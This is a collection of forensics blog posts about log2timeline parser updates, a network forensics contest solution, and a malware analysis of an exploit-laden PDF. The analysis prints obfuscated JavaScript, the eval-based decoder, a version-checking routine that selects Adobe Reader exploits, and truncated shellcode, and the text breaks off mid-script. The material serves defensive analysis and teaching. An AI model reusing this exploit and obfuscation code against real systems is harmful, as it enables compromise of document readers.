SANS EU Forensics Summit

January 26th, 2010 kiddi No comments

I just wanted to write a short post about the upcoming SANS European Digital Forensics and and Incident Response Summit that will take place in London on the 19th and 20th of April.  I encourage everyone that has the chance to attend since there are some very interesting talks, such as; Jesse Kornblum’s talk about fuzzy hashing, Keith Foggon’s discussions about trends and techniques and Lee Whitfield’s Windows Shadow Volumes presentation.

I will also be there, talking about log2timeline.  The title of my talk is Mastering the Super Timeline – log2timeline style.  After the talk I will participate in a tool talk panel, so there is your chance to pound me with some difficult questions…

The abstract of my talk is:

Traditional timeline analysis can be extremely useful yet it sometimes misses important events that are stored inside files on the suspect system (log files, OS artifacts).  By solely depending on traditional filesystem timeline the investigator misses context that is necessary to get a complete and accurate description of the events that took place.  To achieve this goal of enlightenment we need to dig deeper and incorporate information found inside artifacts or log files into our timeline analysis and create some sort of super timeline. These artifacts or log files could reside on the suspect system itself or in another device, such as a firewall or a proxy.  This talk will focus on the tool log2timeline, which is a framework built to parse different log files and artifacts to produce a super timeline in an easy automatic fashion, designed to assist investigators in their timeline analysis.

So the talk will contain some of the work in my upcoming Gold paper, titled “Mastering the Super Timeline With log2timeline” (did someone notice the similarities between the titles).  The paper should be published soon, at least before the summit.

Version 0.41 of log2timeline published

January 22nd, 2010 kiddi No comments

I’ve just published version 0.41 of log2timeline, for a full list of the changes read the changelog.  This upgrade is a recommended upgrade since it contains several bug fixes as well as enhancements to the tool.  I’ve added new input modules for: Google’s Chrome History, Opera History, Firefox Bookmarks, and Windows Event Logs (EVTX). I’ve also added a new output module, CEF, for the Common Event Format as designed by ArcSight as well as improving few other input modules (more on that later).

In my last post I talked about Opera history files as well as the bookmark feature of older versions of Firefox.  Since I’ve added support for the bookmarks features in older versions of Firefox (the ones that still store their bookmark information in the bookmarks.html file) I decided to include those information in the newer versions of the browser as well.  As of version 3+ of Firefox it no longer stores bookmark information inside the bookmarks.html file.  Instead it stores them in the places.sqlite database, the same one that contains the browser history.  Therefore I upgraded the firefox3 input module to include information about bookmarks, which are stored inside the moz_bookmarks table as well as in inside the moz_places table.  The SQL command used to pull out information from the bookmarks is the following:

SELECT moz_bookmarks.type,moz_bookmarks.title,moz_bookmarks.dateAdded,
moz_bookmarks.lastModified,moz_places.url,moz_places.title,
moz_places.rev_host,moz_places.visit_count
FROM moz_places, moz_bookmarks
WHERE
 moz_bookmarks.fk = moz_places.id
 AND moz_bookmarks.type <> 3

There is one field in the moz_bookmarks table that is of special interest, that is the “type” field.  There are three different bookmark types:

  • 1 = A bookmark (URL)
  • 2 = A bookmark folder
  • 3 = Separator

The above SQL command returns all values from the moz_bookmarks table (except separators) that have any corresponding fields inside the moz_places table.  This means that the SQL command in fact only returns bookmarked URL’s, not folders.  So another query is made to get the necessary information about bookmark folders:

SELECT moz_bookmarks.title,moz_bookmarks.dateAdded,moz_bookmarks.lastModified
FROM moz_bookmarks
WHERE
 moz_bookmarks.type = 2

This SQL command extracts all the dates associated with the bookmark folders.  But there are other tables within the places.sqlite database that might contain date objects, that is the table moz_items_annos.  This table contains additional information about bookmarks, that is annotations that are made to bookmarks.  The table stores the time when an annotation was added to a bookmark as well as when it was last modified.  The SQL command used to extract this information from the places.sqlite database is:

SELECT moz_items_annos.content, moz_items_annos.dateAdded
,moz_items_annos.lastModified,moz_bookmarks.title,
moz_places.url,moz_places.rev_host
FROM moz_items_annos,moz_bookmarks,moz_places
WHERE
 moz_items_annos.item_id = moz_bookmarks.id
 AND moz_bookmarks.fk = moz_places.id

An example output of the newly upgraded firefox3 input module is the following:

log2timeline -f firefox3 -z local places.sqlite  | grep Bookmark
...
0|[Firefox3] User: smith Bookmark Annotation: [milw0rm exploits and 0day
exploits database] to bookmark [milw0rm] (http://www.milw0rm.com/)|0|0|0|0|
0|1195573631|1195573631|1195573631|1195573631
...
0|[Firefox3] User: smith Bookmark Folder [Bookmarks Menu]|0|0|0|0|0|
1218738203|1218738203|1195573631|1195573631
...
0|[Firefox3] User: smith  Bookmark URL SANS London 2008 (http://www.sans.org/london08)
[london08] count 0|0|0|0|0|0|1218784170|1218784170|1218784170|1218784170

I’ve also upgraded the flash cookie or Local Shared Object (sol) input module considerably.  The older version was not built to support many of the common flash cookies out there so the new version should implement a parser for every known type of objects there are.  Although I’ve seen some flash cookies that the input module is not capable of parsing that have considerably different binary structure. These files might be an older version of the standard and the current version of the sol input module is unable to parse them (and so are every other SOL editors/parsers that I’ve seen).  I will not include any information about the structure of flash cookies in this post, it will be reserved for a later post.

I’ve also decided not to create all my blog posts on this site and then re-post some of them on the SANS forensics blog. Instead I will post some of the blog posts solely on the SANS blog while others will only be here.  On that spirit I wrote a post about Google’s Chrome browser which can be read here. My blog post about flash cookies will also be posted on the SANS forensics blog site.

Updates to log2timeline

January 5th, 2010 kiddi No comments

I’ve been working on a new version of log2timeline, which according to the roadmap is a “web history add-on”.  I started by creating an input module to parse the simple format of Opera browser.  Opera browser maintains two main history files, the “Opera Global History” and the “Opera Direct History”, which are both in a plain text format (although different).  Besides these two files there are some timestamp information that can be gathered from the binary file download.dat as well as few other binary files (I’ve already started to create an input module to parse the binary format).

The main history file of Opera is called the “Opera Global History” and it is stored using a plain text file where each visit is logged in four lines of the files, with the following structure:

Title of the web site (as displayed in the title bar)
The URL of the visited site
Time of visit (in Epoch time format)
An integer, representing the popularity of the web site

The other history file is called “Opera Direct History”, which is a XML file that stores typed history (urls that are typed into the browser). The structure of the file is the following:

<?xml version="1.0" encoding="ENCODING"?>
<typed_history>
 <typed_history_item content="URL TYPED IN" type="text"
                  last_typed="DATE"/>
</typed_history>

The input module called opera is able to determine which history file is provided as an input to log2timeline and parse the file accordingly.

An example usage is the following:

log2timeline -z local -f opera Opera\ Global\ History
Local timezone is: Atlantic/Reykjavik (GMT)
Start processing file/dir [Opera Global History] ...
Loading output file: mactime
Starting to parse file using format: [opera]
0|[Opera] User unkown visited http://www.opera.com/portal/startup/ (http:// \
www.opera.com/portal/startup/) [2419292]|0|0|0|0|0|1262716353|1262716353| \
1262716353|1262716353
0|[Opera] User unkown visited http://mbl.is/mm/frettir/ (mbl.is - Fréttir) \
 [-1]|0|0|0|0|0|1262716353|1262716353|1262716353|1262716353
0|[Opera] User unkown visited http://mbl.is/mm/vidskipti/frettir/2010/01/05/ \
fitch_laekkar_lanshaefismat/ (Fitch lækkar lánshæfismat - mbl.is) [-1]|0|0|0 \
|0|0|1262716386|1262716386|1262716386|1262716386

And for the direct history file

log2timeline -z local -f opera Opera\ Direct\ History
Local timezone is: Atlantic/Reykjavik (GMT)
Start processing file/dir [Opera Direct History] ...
Loading output file: mactime
Starting to parse file using format: [opera]
0|[Opera] User unkown typed the URL mbl.is directly into the browser \
(type "text")|0|0|0|0|0|1262716352|1262716352|1262716352|1262716352

I’ve also added a support for Google’s Chrome.  In short Google Chrome stores it’s data in a SQLite database, not unlike Firefox (as of version 3), so creating an input module was quite quick for that browser.  The first version of the input module parses three tables;

  • urls – Contains information about each visited URL
  • visits – Contains the timestamp information from each URL
  • downloads – Contains information about the downloads

Going through the Google Chrome’s setup is something that I will reserver for a future blog post, so an example is given of the usage.  This first version of the input module gathers basic information from the history file and displays it in a timeline, future versions will include more detailed versions (need to do more research to determine some parts of the history format)

log2timeline -f chrome -z local History
Local timezone is: Atlantic/Reykjavik (GMT)
Start processing file/dir [History] ...
Loading output file: mactime
Starting to parse file using format: [chrome]
0|[Chrome] URL visited: http://tools.google.com/chrome/intl/en/welcome.html \
(Get started with Google Chrome) [count: 1] Host: tools.google.com (URL not \
typed directly)|0|0|0|0|0|1261044829|1261044829|1261044829|1261044829
0|[Chrome] URL visited: http://www.google.com/ (Google) [count: 1] Host: www.\
google.com (URL not typed directly)|0|0|0|0|0|1261044829|1261044829|1261044829|\
1261044829
0|[Chrome] URL visited: http://www.google.is/ (Google) [count: 1] Host: www.\
google.is visited from: http://www.google.com/ (URL not typed directly)|0|0|0\
|0|0|1261044829|1261044829|1261044829|1261044829
0|[Chrome] URL visited: http://www.google.is/search?hl=is&source=hp&q=try+a+\
single+google+searcg&btnG=Google+leit&lr= (try a single google searcg - Google\
 leit) [count: 1] Host: www.google.is visited from: http://www.google.is/ (URL \
not typed directly)|0|0|0|0|0|1261044876|1261044876|1261044876|1261044876

Then today I saw a post by H. Carvey about browser forensics where he talked about the bookmark file contained in Firefox’s profile folder. He discussed the bookmark file and the fact that there are fields within it with timestamps, most notably the ADD_DATE and LAST_MODIFIED entries for folders, and ADD_DATE and LAST_VISIT entries for the URLs.  So I decided to create a new input module to parse the file, ff_bookmark, which uses HTML::Parser to parse the HTML document and extract the timestamps that are contained within it.  Sample usage is

log2timeline -f ff_bookmark -z local bookmarks.html
Local timezone is: Atlantic/Reykjavik (GMT)
Start processing file/dir [bookmarks.html] ...
Loading output file: mactime
Starting to parse file using format: [ff_bookmark]
0|[Firefox Bookmarks] User modified the bookmark file|0|0|0|0|0|1198266703|\
1198266703|1198266703|1198266703
0|[Firefox Bookmarks] User modified the bookmark folder [Bookmarks Toolbar \
Folder]|0|0|0|0|0|1194274986|1194274986|1194274986|1194274986
0|[Firefox Bookmarks] User created the bookmark Orðabanki [http://herdubreid\
.rhi.hi.is:1026/wordbank/search]|0|0|0|0|0|1189521200|1189521200|1189521200|\
1189521200
0|[Firefox Bookmarks] User visited the the bookmark [Orðabanki]|0|0|0|0|0|\
1195489127|1195489127|1195489127|1195489127
0|[Firefox Bookmarks] User created the bookmark SANS Institute - \\
International Training Events [http://feeds.feedburner.com/SansInstituteInter\
nationalEvents]|0|0|0|0|0|1193489569|1193489569|1193489569|1193489569
0|[Firefox Bookmarks] User created the bookmark folder [Öryggisvitund]|0|0|0|\
0|0|1191448948|1191448948|1191448948|1191448948
0|[Firefox Bookmarks] User modified the bookmark folder [Öryggisvitund]|0|0\
|0|0|0|1193819896|1193819896|1193819896|1193819896
0|[Firefox Bookmarks] User created the bookmark ISC: Tip #1 [http://isc.sans.\
org/diary.html?storyid=3438]|0|0|0|0|0|1191448977|1191448977|1191448977|1191448977

These input modules are not part of the published log2timeline tool, but they are all available in the development version of the tool, which can be found here.

Categories: Forensics Tags:

Finally a new version of log2timeline

November 25th, 2009 kiddi No comments

I’ve been working on a new version for log2timeline for a while now, and I finally managed to complete some testing on the new code.  There are some significant changes to the way that log2timeline works in the new version, 0.40. Some of them are:

  • All timestamps are now normalized to UTC
  • The GUI, glog2timeline, has been updated so that it is feature compatible with log2timeline’s CLI front-end.
  • timescanner has been further developed so that it now can parse all the artifacts that log2timeline is capable of.

Full list of the changes can be seen in the changelog.

The reason why the timestamps have now been normalized is the fact that some timestamps are stored as UTC while others use the operating system’s timezone settings.  This might not be such a big problem when using the log2timeline CLI, since it only takes one file at a time and produces a body file.  However the investigator had to knew that this particular file was either stored in the local timezone or in UTC.

The real problem arises with the use of timescanner.  When timescanner is used a directory is recursively searched for all parsable artifacts.  This means that the tool parses both the artifacts that have timestamps in UTC as well as those stored in the native timezone settings, and stores them in the same body file.  This causes the timestamps to vary and causes problems during analysis.  For this reason all timestamps are now normalized so that the output is in UTC.  This means however that the investigator now needs to provide the timezone settings of the suspect machine both to the timescanner/glog2timeline/log2timeline tool as well as mactime (if that tool is used to convert the body file to a working timeline).

The new version of the tool has been tested only on a few test cases, so if you find any bugs in it or have comments, don’t hesitate to contact me, kristinn

Second Network Forensics Contest

November 23rd, 2009 kiddi 3 comments

I just wanted to go over my solution to the second network forensics contest.

First of all a little disclaimer, since this is a competition where scripting is encouraged I decided beforehand to write a script and not rely on any available tools to complete this task (or at least to minimize usage of previous tools).

To begin with, we know that Ann is being monitored closely, since she was an apparent flight risk. After Ann’s disappearance the police brings along a network capture, claiming it to quite possibly indicate her whereabouts.

There are definitely some questions that need to be answered.  So to begin with, let’s examine the content quickly using tcpdump.  We want to see every IP and port number that has issued any IP traffic.  So let’s begin by quickly seeing all the possible sources.

tcpdump -nn -r evidence02.pcap  | awk -F 'IP' '{print $2}' | \
awk '{print $1}' | sort -nu
reading from file evidence02.pcap, link-type EN10MB (Ethernet)
10.1.1.20.53
64.12.102.142.587
192.168.1.10.52111

And then to see all the destinations.

tcpdump -nn -r evidence02.pcap | grep IP  | awk -F '>' '{print $2}' \
| awk '{print $1}' | sort -nu
reading from file evidence02.pcap, link-type EN10MB (Ethernet)
10.1.1.20.53:
64.12.102.142.587:
192.168.1.30.514:

We see a traffic that most likely is a DNS traffic (port 53) and then some other traffic that seems to going to the server 64.12.102.142 on port 587.  Let’s examine the TCP traffic little bit closer using a script that I wrote for the previous network forensic challenge, pcapcat.

pcapcat -r evidence02.pcap -b 0
[1] TCP 192.168.1.159:1036 -> 64.12.102.142:587
[2] TCP 192.168.1.159:1038 -> 64.12.102.142:587

We see that there are only two TCP connections that have been set up in this dump.  And they correspond with the output that we saw from tcpdump, that is Ann’s laptop is clearly communicating to the sever 64.12.102.142 on port 587.  We need to examine this traffic little closer, so let’s dump it using pcapcat.

pcapcat -r evidence02.pcap
[1] TCP 192.168.1.159:1036 -> 64.12.102.142:587
[2] TCP 192.168.1.159:1038 -> 64.12.102.142:587
Enter the index number of the conversation to dump or press enter to quit: 1
Dumping index value 1
Unable to determine output file
Give the name of the output file: file_1

And the second stream

pcapcat -r evidence02.pcap
[1] TCP 192.168.1.159:1036 -> 64.12.102.142:587
[2] TCP 192.168.1.159:1038 -> 64.12.102.142:587
Enter the index number of the conversation to dump or press enter to quit: 2
Dumping index value 2
Unable to determine output file
Give the name of the output file: file_2

Now we have two files, file_1 and file_2 that contain the gathered TCP stream from the network capture.  Start by checking out what this is. Try to identify the content using the command file, which uses magic values to determine the filetype.

file file_*
file_1: ASCII HTML document text, with CRLF line terminators
file_2: ASCII HTML document text, with CRLF line terminators

According to the file command, we are dealing with a HTML document.  Let’s try to see if that is correct

head -3 file_1
220 cia-mc06.mx.aol.com ESMTP mail_cia-mc06.1; Sat, 10 Oct 2009 15:35:16 -0400
EHLO annlaptop
250-cia-mc06.mx.aol.com host-69-140-19-190.static.comcast.net

head -3 file_2
220 cia-mc07.mx.aol.com ESMTP mail_cia-mc07.1; Sat, 10 Oct 2009 15:37:56 -0400
EHLO annlaptop
250-cia-mc07.mx.aol.com host-69-140-19-190.static.comcast.net

By examining the first three lines in each of these documents it becomes clear to use that this is in fact not a HTML document but a SMTP conversation.  So now we know that Ann was actually sending e-mails to the server 64.12.102.142

What IP address is this, let’s examine that a bit:

 dig -x 64.12.102.142
; <<>> DiG 9.6.0-APPLE-P2 <<>> -x 64.12.102.142
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57356
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 1
;; QUESTION SECTION:
;142.102.12.64.in-addr.arpa.    IN    PTR
;; ANSWER SECTION:
142.102.12.64.in-addr.arpa. 3600 IN    PTR    smtp-mc.mx.aol.com.
;; AUTHORITY SECTION:
102.12.64.in-addr.arpa.    3600    IN    NS    dns-02.ns.aol.com.
102.12.64.in-addr.arpa.    3600    IN    NS    dns-01.ns.aol.com.
;; ADDITIONAL SECTION:
dns-02.ns.aol.com.    51683    IN    A    205.188.157.232
...

We see that the reverse DNS (or the PTR record) for the IP address points to a server that looks to be a SMTP server belonging to AOL, which can be further strengthen by issuing a whois against the IP address:

whois  64.12.102.142
OrgName:    America Online, Inc.
OrgID:      AMERIC-158
Address:    10600 Infantry Ridge Road
City:       Manassas
StateProv:  VA
PostalCode: 20109
Country:    US
NetRange:   64.12.0.0 - 64.12.255.255
CIDR:       64.12.0.0/16
NetName:    AOL-MTC
NetHandle:  NET-64-12-0-0-1
Parent:     NET-64-0-0-0-0
NetType:    Direct Assignment
NameServer: DNS-01.NS.AOL.COM
NameServer: DNS-02.NS.AOL.COM
Comment:
RegDate:    1999-12-13
Updated:    1999-12-16
RTechHandle: AOL-NOC-ARIN
RTechName:   America Online, Inc.
RTechPhone:  +1-703-265-4670
RTechEmail:  domains@aol.net
# ARIN WHOIS database, last updated 2009-10-15 20:00
# Enter ? for additional hints on searching ARIN's WHOIS database.

So we now know that Ann did in fact send two e-mails to this server that belongs to AOL.  Now we need to examine the conversation a bit better. To do that I created a script called smtp_anex (SMTP ANalyse and EXtraction tool).  So let’s use that script to analyse the traffic:

./smtp_anex -r file_1 -d data_1
------------------------------------------------------------
 SMTP_ANEX (SMTP ANALYSIS AND EXTRACTION)
------------------------------------------------------------
Information from e-mail header
 Mail from:  sneakyg33k@aol.com
 Recipient:  sec558@gmail.com
Information from e-mail body
 Mail from:  "Ann Dercover" <sneakyg33k@aol.com>
 Mail to  :  <sec558@gmail.com>
 Subject  :  lunch next week
Authentication information:
 Username: sneakyg33k@aol.com
 Password: 558r00lz
Header information:
 date :  Sat, 10 Oct 2009 07
 x-mimeole :  Produced By Microsoft MimeOLE V6.00.2900.2180
 x-mailer :  Microsoft Outlook Express 6.00.2900.2180
 content-type :  multipart/alternative;
 boundary="----=_nextpart_000_0006_01ca497c.3e4b6020" :
 x-priority :  3
 x-msmail-priority :  Normal
 mime-version :  1.0
 message-id :  <000901ca49ae$89d698c0$9f01a8c0@annlaptop>
Additional information:
 data_response: 250 OK
 cmd_ehlo: HASH(0x8b3610)
 banner: 220 cia-mc06.mx.aol.com esmtp mail_cia-mc06.1; sat, 10 oct 2009 15:35:16 -0400
 auth_leftovers: 235 - AUTHENTICATION SUCCESSFUL
 data_cmd_response: 354 start mail input, end with "." on a line by itself
 header: HASH(0x8b6ec0)
------------------------------------------------------------
 The message content
------------------------------------------------------------
-------- Text --------
Sorry-- I can't do lunch next week after all. Heading out of town. =
Another time! -Ann
-------- HTML --------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; =
charset=iso-8859-1">
<META content="MSHTML 6.00.2900.2853" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>Sorry-- I can't do lunch next week =
after all.
Heading out of town. Another time! -Ann</FONT></DIV></BODY></HTML>

The script works by default by going through the SMTP conversation, and plocking out the relevant data.

It then prints the data both on screen and saves it to files (the printing to screen can be silenced using the option -q).  I used the option -d to save all the data in the folder “data_1″, which now contains the following files:

  • 1-HTML.html
  • 1-RAW.txt
  • 1-Text.txt
  • 1-info.txt

We can clearly see from the output that Ann was sending this e-mail from the address sneakyg33k@aol.com and was sending it to the address sec558@gmail.com.  The content of the conversation was (again taken from the output of the script):

Sorry-- I can't do lunch next week after all. Heading out of town. =
Another time! -Ann

This looks to be quite suspicious.  Ann is claiming that se cannot do lunch because she is heading out of town?

We also see the username and password that Ann uses in this conversation:

Authentication information:
 Username: sneakyg33k@aol.com
 Password: 558r00lz

The authentication information that the script reads comes from the command AUTH that is issued during the SMTP conversation:

AUTH LOGIN
334 VXNlcm5hbWU6
c25lYWt5ZzMza0Bhb2wuY29t
334 UGFzc3dvcmQ6
NTU4cjAwbHo=
235 AUTHENTICATION SUCCESSFUL

This is a very common authentication mechanism (LOGIN), where base64 is used to encode the messages, if we just decode it, we get:

S: 334 Username:
C: sneakyg33k@aol.com
S: 334 Password:
C: 558r00lz
S: 235 AUTHENTICATION SUCCESSFUL

where S: denotes server communications and C: client one. But we do not need to do this manually, the script does this for us.

Let’s examine the second e-mail a bit close, again using the script

smtp_anex -r file_2 -d data_2
------------------------------------------------------------
 SMTP_ANEX (SMTP ANALYSIS AND EXTRACTION)
------------------------------------------------------------
Information from e-mail header
 Mail from:  sneakyg33k@aol.com
 Recipient:  mistersecretx@aol.com
Information from e-mail body
 Mail from:  "Ann Dercover" <sneakyg33k@aol.com>
 Mail to  :  <mistersecretx@aol.com>
 Subject  :  rendezvous
Authentication information:
 Username: sneakyg33k@aol.com
 Password: 558r00lz
Header information:
 date :  Sat, 10 Oct 2009 07
 x-mimeole :  Produced By Microsoft MimeOLE V6.00.2900.2180
 x-mailer :  Microsoft Outlook Express 6.00.2900.2180
 boundary="----=_nextpart_000_000d_01ca497c.9dec1e70" :
 content-type :  multipart/mixed;
 x-priority :  3
 x-msmail-priority :  Normal
 mime-version :  1.0
 message-id :  <001101ca49ae$e93e45b0$9f01a8c0@annlaptop>
Additional information:
 data_response: 250 OK
 msg: Attachment dumped to file - name: secretrendezvous.docx
 cmd_ehlo: HASH(0x8b3610)
 banner: 220 cia-mc07.mx.aol.com esmtp mail_cia-mc07.1; sat, 10 oct 2009 15:37:56 -0400
 auth_leftovers: 235 - AUTHENTICATION SUCCESSFUL
 data_cmd_response: 354 start mail input, end with "." on a line by itself
 header: HASH(0x8b6ec0)
------------------------------------------------------------
 The message content
------------------------------------------------------------
-------- Text --------
Hi sweetheart! Bring your fake passport and a bathing suit. Address =
attached. love, Ann
-------- HTML --------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; =
charset=iso-8859-1">
<META content="MSHTML 6.00.2900.2853" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>Hi sweetheart! Bring your fake passport =
and a

bathing suit. Address attached. love, Ann</FONT></DIV></BODY></HTML>

Now this looks to be quite suspicious, we can see from the output that Ann is again sending an e-mail, and this time to mistersecretx@aol.com with the subject of “rendezvous”.  The text from the message is:

Hi sweetheart! Bring your fake passport and a bathing suit. Address =
attached. love, Ann

We also see from the output of the script the following additional information:

 msg: Attachment dumped to file - name: secretrendezvous.docx

So there was an attachment with the message, let’s examine the output of the folder data_2

  • 1-HTML.html
  • 1-RAW.txt
  • 1-Text.txt
  • 1-info.txt
  • 1-secretrendezvous.docx

We can therefore examine the content of the attachment. First of all, let’s calculate the MD5sum of the docx document that was attached to the e-mail.

9e423e11db88f01bbff81172839e1923  data_2/1-secretrendezvous.docx

Since this is a .docx document, we can use other scripts to read it, such as cat_open_xml.pl

cat_open_xml.pl 1-secretrendezvous.docx
Meet me at the fountain near the rendezvous point. Address below. I'm bringing
all the cash.
returning from a call..

We don’t get much from this, perhaps there is more to this document than just text.  Since we know that docx documents are nothing more than a simple ZIP file we can just extract the content of the document:

unzip -d doc 1-secretrendezvous.docx
Archive:  1-secretrendezvous.docx
 inflating: doc/[Content_Types].xml
 inflating: doc/_rels/.rels
 inflating: doc/word/_rels/document.xml.rels
 inflating: doc/word/document.xml
 extracting: doc/word/media/image1.png  
 inflating: doc/word/theme/theme1.xml
 inflating: doc/word/settings.xml
 inflating: doc/word/webSettings.xml
 inflating: doc/word/styles.xml
 inflating: doc/docProps/core.xml
 inflating: doc/word/numbering.xml
 inflating: doc/word/fontTable.xml
 inflating: doc/docProps/app.xml

Now we see that there is an image that is contained within the document.  Let’s examine it

md5sum doc/word/media/image1.png
aadeace50997b1ba24b09ac2ef1940b7  doc/word/media/image1.png

The image seems to be taken from Google maps, displaying the meeting place.

Playa del Carmen
1. Av. Constituyentes 1 Calle 10 x la 5ta
Avenida
Playa del Carmen, 77780, Mexico
01 984 873 4000
Meeting Place

Meeting Place

Now we know that there are strong indications that Ann’s secret lover has the email address mistersecretx@aol.com (very sneaky address) and that Ann was sending him a message containing a possible meeting point (again a very subtle document called secretrendezvous).  This could very well be the location where she is at right now (since she has disappeared already and this seems to be the only clue of her whereabouts).

The rest is up to the police chief, our job here is done…

Malware analysis

November 19th, 2009 kiddi No comments

I decided to to some malware analysis as a part of some presentation I had to do.  And since I went through the process, I decided to post it here if anyone is interested.

To begin with, I needed to find some malware to analyze.  And a great place to find live links to active malware is to visit the site: http://www.malwaredomainlist.com/mdl.php.

What I wanted to show was that despite having a fully patched machine with a fully updated AV is not always enough to protect you.  One way to do that is to either find a PDF or Flash exploit.  The one that I chose for this experiment was this one:

PDF exploit to be used

PDF exploit to be used

First things first, to download the malware example and do some static analysis on it.  First of all I ran pdfid.py from Didier Stevens to get some ID about the PDF document

pdfid.py dhkn.pdf
PDFiD 0.0.9 dhkn.pdf
 PDF Header: %PDF-1.4
 obj                    9
 endobj                 9
 stream                 2
 endstream              2
 xref                   0
 trailer                1
 startxref              1
 /Page                  0
 /Encrypt               0
 /ObjStm                0
 /JS                    1
 /JavaScript            2
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Colors > 2^24         0

By looking at this we can see that there is a Javascript code in the document, which is commonly used to exploit Adobe Reader and we also see that there are some streams in the document.  Now we need to take a closer look at the source code of the document. This can be done with any text editor, such as vim or just use less (or cat).

If we examine the document we don’t see any text part, just a stream that is JavaScript,

...
endstream
endobj
6 0 obj
<</CS /DeviceRGB /S /Transparency >>
endobj
7 0 obj
<</Length 76450 /Filter [/ASCIIHexDecode]>>
stream
7661722066686e7075783d27273b6567686a76783d22223b616567777a3d35303431323b6465757....
...

This stream can be easily decoded.  We see that the filter that is used is a simple ASCIIHexDecode, so I simply copy the stream

grep ^stream dhkn.pdf -A 2  > stream

I then edit the file and deleted lines that did not belong to the stream itself.  Since the file now contained only the hex code of the stream I could decode it with a simple Perl script

#!/usr/bin/perl

use strict;

my $line = undef;
my $string = undef;

my $file = shift;

die( 'Wrong usage: ' . $0 . ' FILE' ) unless -e $file;

open( FH, $file ) or die( 'Unable to read file ' . $file );
open( RW, '>' . $file . '.txt' );

while( $line = <FH> )
{
 print "Processing line\n";
 $line =~ s/\%//g;

 $string = pack 'H*', $line;
 print RW $string;
}

close( FH );
close( RW );

I run the script like this:

./conv.pl stream

The content of the text file stream.txt looks something like this

var fhnpux='';eghjvx="";aegwz=50412;deuv="";var fiqy='',lmuz=false,ekrt=true,gpqr=false,
hnrty='',hloqr=0,dimtz=String,afioxy=dimtz['fkrEoAmkCBhkaBrRCAoAdkeE'.replace(/[EABkR]/g,'')],
gilmq=String,abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')],ikmqw="61",begily="",aefmos=[67,59,
63,151,171,159,153,165,159,160,164,81,156,154,174,144,159,165,94,170,151,163,169,161,98,81,162,...
...

Obviously a obfuscated JavaScript.  So we need to dig a little deeper. To make it easier to read a simple substitution is done

cat stream.txt | sed -e 's/;/;\n/g' > stream.js

This makes the code a litte bit easier to read.  Then to make it even more easy, vim is used to edit the file and add spaces and new lines where needed. There are two things in this code that are interesting (well the two most interesting things that pop up at least).  First of all the function close to the end of the file:

lquv=function()
{
      for(var fjpu;hloqr<aefmos.length;hloqr+=1)
      {
                var fjqu=hloqr%ikmqw.length+1;
                var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
                var blrwy=aefmos[hloqr];
                begily+=afioxy(blrwy-dorvy.charCodeAt(0));
        }
        abdmv(begily);
};
lquv();

We see that we have a function called “lquv” which is seems to take care of decoding the obfuscation of the code.  We see in the end a function called “adbmv” is called with the parameter of begily, which is the variable that holds the decoded JavaScript.  The function “adbmv” is defined above in the code:

gilmq=String
abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')]

This is a very simple obfuscation.  We see that “gilmq” is defined as a String and then “abdmv” is (when we complete the simple substition)

gilmq['eval']

So when the function calls “abdmv(begily)” we are about to evaluate or execute the code that is displayed in the variable begily.  We therefore need to know what is inside the variable “begily”.  The basis for “begily” resides in the variable “aefmos” (the second interesting thing we found), which is defined as:

aefmos=[67,59,6....

The easiest way (or at least an easy method) to decode this string is simply to modify the stream.js to a HTML document and open it up in a browser or other JavaScript interpreter.

We add to the top of the document

<html>
<head><title>TESTING</title></head>
<body>
<script>

And at the bottom

</script>
</body>
</html>

We then modify the JavaScript itself.  First of all the document ends with a ?, which we delete.  Then we modify the function "lquv" so that it prints the JavaScript instead of evaluating it.

lquv=function()
{
 for(var fjpu; hloqr<aefmos.length;hloqr+=1)
 {
 var fjqu=hloqr%ikmqw.length+1;
 var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
 var blrwy=aefmos[hloqr];
 begily+=afioxy(blrwy-dorvy.charCodeAt(0));
 }
 //abdmv(begily);
 document.write(begily);
};

The change that I made is written in bold.  I then open this document up in a sandboxed environment to get the variable begily decoded.  This script looks like this:

function fix_it(yarsp, len)
{
 while (yarsp.length * 2 < len)
 {
 yarsp += yarsp;
 }

 yarsp = yarsp.substring(0, len/2);
...

Now we have the true JavaScript code that is to be run on the machine.  Inside this there are several functions, some of which contain the magic variable name “shellcode” or “payload”, which is usually considered to be an indication of a malware (if the obfuscation isn’t enough).  Near the end of the code we see this:

function pdf_start()
{
 var version = app.viewerVersion.toString();
 version = version.replace(/\D/g,'');
 var varsion_array = new Array(version.charAt(0), version.charAt(1), \
version.charAt(2));

 if ((varsion_array[0] == 8 ) && (varsion_array[1] == 0) || \
(varsion_array[1] == 1 && varsion_array[2] < 3))
 {
 util_printf();
 }

 if ((varsion_array[0] < 8 ) || (varsion_array[0] == 8 && \
varsion_array[1] < 2 && varsion_array[2] < 2))
 {
 collab_email();
 }

 if ((varsion_array[0] < 9 ) || (varsion_array[0] == 9 && \
varsion_array[1] < 1))
 {
 collab_geticon();
 }
}

pdf_start();

This function is called in the end and we can see that it begins by getting the Adobe Reader version code before going through an if sentence, trying to determine which exploit to use based on the version number.  This particular exploit is used against Adobe Reader versions:

  • 8.0 or 8.1.0-8.1.2
  • Older versions than 8.0 or version 8.2.0-2
  • Older versions than 9.0 or 9.0

There are different exploits run based on on of listed criteria above.  If we examine the payloads or shellcodes, we see that they are coded using the JavaScript function “escape” and are all similar to the one listed below:

var payload = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0....

To further analyse this malware the payload has to be examined.  So we copy the payload to a file and create a simple Perl script to change the JavaScript to binary:

#!/usr/bin/perl
use strict;
use Encode;

my $file = shift;
my $line = undef;
my $string = undef;
my @chars = undef;
my $done;

